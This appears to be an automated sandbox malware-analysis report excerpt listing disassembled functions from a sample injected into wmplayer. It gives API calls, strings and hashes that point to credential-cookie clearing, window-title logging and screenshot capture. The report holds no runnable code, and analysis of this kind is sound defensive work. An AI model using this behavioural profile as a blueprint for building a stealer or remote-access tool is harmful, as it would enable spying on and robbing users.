                                                                                            Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                            • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                            • Opcode Fuzzy Hash: d2c3ac181d975cfacaee5c3ec40136b8bdf5b2422b9dd14ab5655829a2308330
                                                                                            • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                            Function 100086E4 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                                                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                                                                                            • __freea.LIBCMT ref: 100087D5
                                                                                              • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                            • String ID:
                                                                                            • API String ID: 2652629310-0
                                                                                            • Opcode ID: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                            • Instruction ID: 5b9b35b0a4db414dac5c81271493033b4f2f0f3dd9b893eeefd60fa04c8ec889
                                                                                            • Opcode Fuzzy Hash: 11ee239c82756698d200c57d0e0d3564a08309f574ce1b92975b0cd3435ea26e
                                                                                            • Instruction Fuzzy Hash: 2731AE32A0021AABEF15CF64CC85EAF7BA5EF44290F214129FC48D7158EB35DE50CBA0
                                                                                            Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                            • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                            • API String ID: 3472027048-1236744412
                                                                                            • Opcode ID: b4a0932546c662d439eb54e3763843a1a735f9e24cdb101a0487eced1e26abef
                                                                                            • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                            • Opcode Fuzzy Hash: b4a0932546c662d439eb54e3763843a1a735f9e24cdb101a0487eced1e26abef
                                                                                            • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                            Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                              • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                              • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQuerySleepValue
                                                                                            • String ID: @CG$exepath$BG
                                                                                            • API String ID: 4119054056-3221201242
                                                                                            • Opcode ID: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                            • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                            • Opcode Fuzzy Hash: 210cb540f6a83319de20fac2fd682447bc31916e54f5a605e097a05a178efdaa
                                                                                            • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                            Function 004185F1 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnumDisplayMonitors.USER32(00000000,00000000,004186FC,00000000), ref: 00418622
                                                                                            • EnumDisplayDevicesW.USER32(?), ref: 00418652
                                                                                            • EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 004186C7
                                                                                            • EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004186E4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: DisplayEnum$Devices$Monitors
                                                                                            • String ID:
                                                                                            • API String ID: 1432082543-0
                                                                                            • Opcode ID: d5f935f21ff977a325b16e0238022c9b65baa15484adc771af36005d0498d86d
                                                                                            • Instruction ID: c4057a13d51126afc728f52e86ef46095e095b9ab785e002ac05b4ca5e4d76c5
                                                                                            • Opcode Fuzzy Hash: d5f935f21ff977a325b16e0238022c9b65baa15484adc771af36005d0498d86d
                                                                                            • Instruction Fuzzy Hash: 9221B1722043046BD220EF16DC44EABFBECEFD1754F00052FB949D3191EE74AA45C6AA
                                                                                            Function 0041A98A Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: SystemTimes$Sleep__aulldiv
                                                                                            • String ID:
                                                                                            • API String ID: 188215759-0
                                                                                            • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                            • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                                                            • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                            • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                                                            Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
                                                                                              • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                              • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729
                                                                                            • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                            • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Window$SleepText$ForegroundLength
                                                                                            • String ID: [ $ ]
                                                                                            • API String ID: 3309952895-93608704
                                                                                            • Opcode ID: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                            • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                            • Opcode Fuzzy Hash: 92cb9d2a2d6bf6289d44fec474a7e000b4a54ab88b054bee990bed59a71b9a03
                                                                                            • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                            Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                            • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                            • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                            • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                            Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                            • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                            • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                            • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                            Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                              • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                              • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                            • String ID:
                                                                                            • API String ID: 737400349-0
                                                                                            • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                            • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                            • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                            • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                            Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
                                                                                            • GetLastError.KERNEL32(?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,00000000,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 3177248105-0
                                                                                            • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                            • Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
                                                                                            • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                            • Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8
                                                                                            Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                                                            • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 3177248105-0
                                                                                            • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                            • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                                                            • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                                                            • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                                                            Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 00418519
                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0041851F
                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 00418525
                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0041852B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem
                                                                                            • String ID:
                                                                                            • API String ID: 4116985748-0
                                                                                            • Opcode ID: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                            • Instruction ID: 928f1b056b10b768f566869b0c9e39fed015f0adb742d9b99f9daccd71f82e50
                                                                                            • Opcode Fuzzy Hash: 5cbd94679aa6c8e7ceff70e29103114ee131790299e318eb9a9968d7a4031cfb
                                                                                            • Instruction Fuzzy Hash: 96F0D672B043216BCA00EA798C4556FBB97DFD02A4F25083FE6059B341DEB8EC4687D9
                                                                                            Function 00441EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00441F6D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorHandling__start
                                                                                            • String ID: pow
                                                                                            • API String ID: 3213639722-2276729525
                                                                                            • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                            • Instruction ID: c296867054112a427edbdd16b3baf579c6faf9d8481746a729c2ad46b2c40409
                                                                                            • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                            • Instruction Fuzzy Hash: 2A517B61A1620196F7117714C98137F2BD0DB50741F688D6BF085423F9DF3D8CDA9A4E
                                                                                            Function 100063F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 1000655C
                                                                                              • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017,100062AB,00000000,?,?,?,?,00000016,?,?,100062B8,00000000,00000000,00000000,00000000,00000000), ref: 100062BE
                                                                                              • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                                                                                              • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4571892049.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4571861777.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4571892049.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_10000000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                            • String ID: *?$.
                                                                                            • API String ID: 2667617558-3972193922
                                                                                            • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                            • Instruction ID: 55016225c6cf3c2ad74d5bf99958d96f24b8fe448c0df4d83e2be8db5664878a
                                                                                            • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                                                            • Instruction Fuzzy Hash: 2D519475E0060A9FEB14CFA8CC81AADB7F6FF4C394F258169E854E7349D635AE018B50
                                                                                            Function 0044DB34 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB59
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Info
                                                                                            • String ID: $fD
                                                                                            • API String ID: 1807457897-3092946448
                                                                                            • Opcode ID: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                            • Instruction ID: 070357306f4c5095a08430c9ceac02bf5c2973ae7142a422f036c1757655e3b4
                                                                                            • Opcode Fuzzy Hash: af305b060504fe74110eba1b75a066a7b29ec04ef294ab3684049637f65bd75b
                                                                                            • Instruction Fuzzy Hash: C241FA7090439C9AEB218F24CCC4BF6BBB9DF45308F1404EEE59A87242D279AE45DF65
                                                                                            Function 00417BDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417C08
                                                                                              • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                            • SHCreateMemStream.SHLWAPI(00000000), ref: 00417C55
                                                                                              • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                              • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                                                            • String ID: image/jpeg
                                                                                            • API String ID: 1291196975-3785015651
                                                                                            • Opcode ID: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
                                                                                            • Instruction ID: 3dbe320e324aa312c145f712c1d391ec03548c85c69305bb74e69b0931de3aa8
                                                                                            • Opcode Fuzzy Hash: e815ce1b6b5f94e363a1fc2ff1c8119a4cd834232fd605746a95e2bb31494ea3
                                                                                            • Instruction Fuzzy Hash: 13315C75508300AFC301AF65C884DAFBBF9FF8A704F000A2EF94597251DB79A905CBA6
                                                                                            Function 004508DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B39,?,00000050,?,?,?,?,?), ref: 004509B9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ACP$OCP
                                                                                            • API String ID: 0-711371036
                                                                                            • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                            • Instruction ID: 7e3e8aaac6bfe0b7539266298c93f9b0706a3ab6a9e9f394231f134d2b8bf5b7
                                                                                            • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                            • Instruction Fuzzy Hash: 072138EAA04201A6F7348B558801B9B7396AF54B23F164826EC49D730BF739DD49C358
                                                                                            Function 00417CD9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00417CF4
                                                                                              • Part of subcall function 004177A2: GdipLoadImageFromStream.GDIPLUS(?,?,?,00417C1B,00000000,?,?,?,?,00000000), ref: 004177B6
                                                                                            • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00417D19
                                                                                              • Part of subcall function 00417815: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00417C71,00000000,?,?), ref: 00417827
                                                                                              • Part of subcall function 004177C5: GdipDisposeImage.GDIPLUS(?,00417CCC), ref: 004177CE
